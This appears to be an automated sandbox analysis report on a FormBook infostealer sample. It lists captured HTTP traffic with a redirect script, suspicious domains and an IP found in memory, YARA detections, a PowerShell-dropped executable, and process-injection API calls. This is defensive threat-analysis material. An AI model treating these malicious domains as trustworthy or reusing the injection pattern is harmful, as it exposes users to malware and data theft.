00 00 00 00 00 00 03 b2 29 4e 2e ca 2c 28 b1 2b cf cc 4b c9 2f d7 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d 53 b0 55 50 ca 28 29 29 28 b6 d2 d7 2f 2f 2f d7 cb cb 2d 37 36 33 d5 ab a8 ac 52 b2 d1 87 ea 03 00 00 00 ff ff 03 00 af c2 1c df 40 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 55)N.,(+K/ON,(JMSUP())(///-763R@0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:43:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1xEmpVzv%2BWL9yDAlzqGRbutAOCeuYCcic2V9mat3zMipPtBOBXP8TCxf8JGN3azLcXWcDwyUU2oH7xKyPeseLqTVIhCG9DaQRuDiMv1ZOx43AdW9DvEMA6FE0KNbZGyBkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fd16cdd164763-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=52337&min_rtt=52337&rtt_var=26168&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1846&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b2 29 4e 2e ca 2c 28 b1 2b cf cc 4b c9 2f d7 cb c9 4f 4e 2c c9 cc cf d3 cb 28 4a 4d 53 b0 55 50 ca 28 29 29 28 b6 d2 d7 2f 2f 2f d7 cb cb 2d 37 36 33 d5 ab a8 ac 52 b2 d1 87 ea 03 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 af c2 1c df 40 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 4b)N.,(+K/ON,(JMSUP())(///-763Ra@0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 17:43:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8CHugJOk5Er2ritdSmZ7AfBeIvYjHryN5TkXBB0CjnclW0OujmKO3neVMi5Wln1fvM10DgiHLF8ejrqqVxTVVAR%2B6GqVtKqycGx8pKkms6c%2BYzKVSFzDyToy44SSLkUWaA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913fd17cfce9acdb-MSPalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=32858&min_rtt=32858&rtt_var=16429&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=554&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 34 30 0d 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 6d 77 33 36 35 2e 78 79 7a 22 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 40<script>window.location.href = "https://www.nmw365.xyz"</script>0

Source: runonce.exe, 0000000F.00000002.3732343518.0000000005F68000.00000004.10000000.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.0000000003968000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
Source: powershell.exe, 00000000.00000002.1265979436.000000000621D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1252079445.0000000005306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1251229454.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1252079445.00000000051B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1252079445.0000000005306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1251229454.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: pWjI78htpJ4.exe, 00000010.00000002.3731547549.0000000002DAC000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.besttreasurespot.shop
Source: pWjI78htpJ4.exe, 00000010.00000002.3731547549.0000000002DAC000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.besttreasurespot.shop/xvk7/
Source: runonce.exe, 0000000F.00000002.3732343518.00000000068D4000.00000004.10000000.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.00000000042D4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://35.241.104.76:36189
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000000.00000002.1252079445.00000000051B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000000.00000002.1265979436.000000000621D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1265979436.000000000621D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1265979436.000000000621D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000000.00000002.1252079445.0000000005306000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1251229454.000000000313D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: runonce.exe, 0000000F.00000002.3732343518.00000000068D4000.00000004.10000000.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.00000000042D4000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://hm.baidu.com/hm.js?90db264d7e53e8281dc001cee11cc24b
Source: runonce.exe, 0000000F.00000002.3728763168.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: runonce.exe, 0000000F.00000002.3728763168.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: runonce.exe, 0000000F.00000002.3728763168.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: runonce.exe, 0000000F.00000002.3728763168.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033=
Source: runonce.exe, 0000000F.00000002.3728763168.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: runonce.exe, 0000000F.00000002.3728763168.0000000003659000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: runonce.exe, 0000000F.00000003.1920050330.00000000084FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000000.00000002.1265979436.000000000621D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: runonce.exe, 0000000F.00000002.3732343518.0000000006F1C000.00000004.10000000.00040000.00000000.sdmp, runonce.exe, 0000000F.00000002.3734099857.0000000008270000.00000004.00000800.00020000.00000000.sdmp, runonce.exe, 0000000F.00000002.3732343518.0000000006D8A000.00000004.10000000.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.000000000491C000.00000004.00000001.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.000000000478A000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: runonce.exe, 0000000F.00000003.1925769242.0000000008509000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: runonce.exe, 0000000F.00000002.3732343518.0000000006BF8000.00000004.10000000.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.00000000045F8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.nmw365.xyz
Source: pWjI78htpJ4.exe, 00000010.00000002.3732048521.0000000003FB0000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.partflix.net/djyl/?jLKPrvv=x4UYXwVOLjDEdQDRDI
Source: pWjI78htpJ4.exe, 00000010.00000002.3732048521.00000000037D6000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.seasay.xyz/c9ts/?jLKPrvv=b2h4705j/BXuiRKtB3JtAMBCvYzPFBfMqHSZnAN25/qy/QtrNwJS7WfSSjTsExA
Source: runonce.exe, 0000000F.00000002.3732343518.0000000005C44000.00000004.10000000.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2032540100.00000000169E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/
Source: runonce.exe, 0000000F.00000002.3732343518.0000000005C44000.00000004.10000000.00040000.00000000.sdmp, pWjI78htpJ4.exe, 00000010.00000002.3732048521.0000000003644000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2032540100.00000000169E4000.00000004.80000000.00040000.00000000.sdmp	String found in binary or memory: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=86884/vhr7/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1733946439.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3731547549.0000000002D40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3731493934.0000000004ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3727855592.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3719515035.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1733243869.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3731500134.0000000002CB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1735711958.00000000034B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 6752, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

PE file contains section with special chars

Source: x.exe.0.dr

Static PE information: section name: qC?Cd22O

PE file has nameless sections

Source: x.exe.0.dr

Static PE information: section name:

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\x.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042CAA3 NtClose,	6_2_0042CAA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2B60 NtClose,LdrInitializeThunk,	6_2_031D2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2DF0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_031D2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2C70 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_031D2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D35C0 NtCreateMutant,LdrInitializeThunk,	6_2_031D35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D4340 NtSetContextThread,	6_2_031D4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D4650 NtSuspendThread,	6_2_031D4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2B80 NtQueryInformationFile,	6_2_031D2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2BA0 NtEnumerateValueKey,	6_2_031D2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2BF0 NtAllocateVirtualMemory,	6_2_031D2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2BE0 NtQueryValueKey,	6_2_031D2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2AB0 NtWaitForSingleObject,	6_2_031D2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2AD0 NtReadFile,	6_2_031D2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2AF0 NtWriteFile,	6_2_031D2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2F30 NtCreateSection,	6_2_031D2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2F60 NtCreateProcessEx,	6_2_031D2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2F90 NtProtectVirtualMemory,	6_2_031D2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2FB0 NtResumeThread,	6_2_031D2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2FA0 NtQuerySection,	6_2_031D2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2FE0 NtCreateFile,	6_2_031D2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2E30 NtWriteVirtualMemory,	6_2_031D2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2E80 NtReadVirtualMemory,	6_2_031D2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2EA0 NtAdjustPrivilegesToken,	6_2_031D2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2EE0 NtQueueApcThread,	6_2_031D2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2D10 NtMapViewOfSection,	6_2_031D2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2D00 NtSetInformationFile,	6_2_031D2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2D30 NtUnmapViewOfSection,	6_2_031D2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2DB0 NtEnumerateKey,	6_2_031D2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2DD0 NtDelayExecution,	6_2_031D2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2C00 NtQueryInformationProcess,	6_2_031D2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2C60 NtCreateKey,	6_2_031D2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2CA0 NtQueryInformationToken,	6_2_031D2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2CC0 NtQueryVirtualMemory,	6_2_031D2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D2CF0 NtOpenProcess,	6_2_031D2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D3010 NtOpenDirectoryObject,	6_2_031D3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D3090 NtSetValueKey,	6_2_031D3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D39B0 NtGetContextThread,	6_2_031D39B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D3D10 NtOpenProcessToken,	6_2_031D3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031D3D70 NtOpenThread,	6_2_031D3D70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A4650 NtSuspendThread,LdrInitializeThunk,	15_2_052A4650
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A4340 NtSetContextThread,LdrInitializeThunk,	15_2_052A4340
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2D30 NtUnmapViewOfSection,LdrInitializeThunk,	15_2_052A2D30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2D10 NtMapViewOfSection,LdrInitializeThunk,	15_2_052A2D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2DF0 NtQuerySystemInformation,LdrInitializeThunk,	15_2_052A2DF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2DD0 NtDelayExecution,LdrInitializeThunk,	15_2_052A2DD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2C60 NtCreateKey,LdrInitializeThunk,	15_2_052A2C60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2C70 NtFreeVirtualMemory,LdrInitializeThunk,	15_2_052A2C70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2CA0 NtQueryInformationToken,LdrInitializeThunk,	15_2_052A2CA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2F30 NtCreateSection,LdrInitializeThunk,	15_2_052A2F30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2FB0 NtResumeThread,LdrInitializeThunk,	15_2_052A2FB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2FE0 NtCreateFile,LdrInitializeThunk,	15_2_052A2FE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2E80 NtReadVirtualMemory,LdrInitializeThunk,	15_2_052A2E80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2EE0 NtQueueApcThread,LdrInitializeThunk,	15_2_052A2EE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2B60 NtClose,LdrInitializeThunk,	15_2_052A2B60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2BA0 NtEnumerateValueKey,LdrInitializeThunk,	15_2_052A2BA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2BE0 NtQueryValueKey,LdrInitializeThunk,	15_2_052A2BE0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	15_2_052A2BF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2AF0 NtWriteFile,LdrInitializeThunk,	15_2_052A2AF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2AD0 NtReadFile,LdrInitializeThunk,	15_2_052A2AD0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A35C0 NtCreateMutant,LdrInitializeThunk,	15_2_052A35C0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A39B0 NtGetContextThread,LdrInitializeThunk,	15_2_052A39B0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2D00 NtSetInformationFile,	15_2_052A2D00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2DB0 NtEnumerateKey,	15_2_052A2DB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2C00 NtQueryInformationProcess,	15_2_052A2C00
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2CF0 NtOpenProcess,	15_2_052A2CF0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2CC0 NtQueryVirtualMemory,	15_2_052A2CC0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2F60 NtCreateProcessEx,	15_2_052A2F60
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2FA0 NtQuerySection,	15_2_052A2FA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2F90 NtProtectVirtualMemory,	15_2_052A2F90
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2E30 NtWriteVirtualMemory,	15_2_052A2E30
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2EA0 NtAdjustPrivilegesToken,	15_2_052A2EA0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2B80 NtQueryInformationFile,	15_2_052A2B80
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A2AB0 NtWaitForSingleObject,	15_2_052A2AB0
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A3010 NtOpenDirectoryObject,	15_2_052A3010
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A3090 NtSetValueKey,	15_2_052A3090
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A3D10 NtOpenProcessToken,	15_2_052A3D10
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_052A3D70 NtOpenThread,	15_2_052A3D70
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03229780 NtDeleteFile,	15_2_03229780
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03229680 NtReadFile,	15_2_03229680
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03229510 NtCreateFile,	15_2_03229510
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03229980 NtAllocateVirtualMemory,	15_2_03229980
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_03229820 NtClose,	15_2_03229820
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_04FDF2CF NtReadVirtualMemory,	15_2_04FDF2CF
Source: C:\Windows\SysWOW64\runonce.exe	Code function: 15_2_04FDF8C4 NtMapViewOfSection,	15_2_04FDF8C4

Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_013411E0	4_2_013411E0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_01340848	4_2_01340848
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_013428D0	4_2_013428D0
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_013407E3	4_2_013407E3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_013407D3	4_2_013407D3
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_013407C1	4_2_013407C1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Code function: 4_2_013428C1	4_2_013428C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004188F3	6_2_004188F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00403000	6_2_00403000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004100CA	6_2_004100CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0042F0D3	6_2_0042F0D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004100D3	6_2_004100D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00401240	6_2_00401240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040E2E3	6_2_0040E2E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_004102F3	6_2_004102F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00416AFE	6_2_00416AFE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00416B03	6_2_00416B03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00402462	6_2_00402462
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00402470	6_2_00402470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040E47C	6_2_0040E47C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040E427	6_2_0040E427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0040E433	6_2_0040E433
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_00402750	6_2_00402750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0325A352	6_2_0325A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032603E6	6_2_032603E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_031AE3F0	6_2_031AE3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03240274	6_2_03240274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032202C0	6_2_032202C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03190100	6_2_03190100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_0323A118	6_2_0323A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_03228158	6_2_03228158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032541A2	6_2_032541A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032601AA	6_2_032601AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 6_2_032581CC	6_2_032581CC
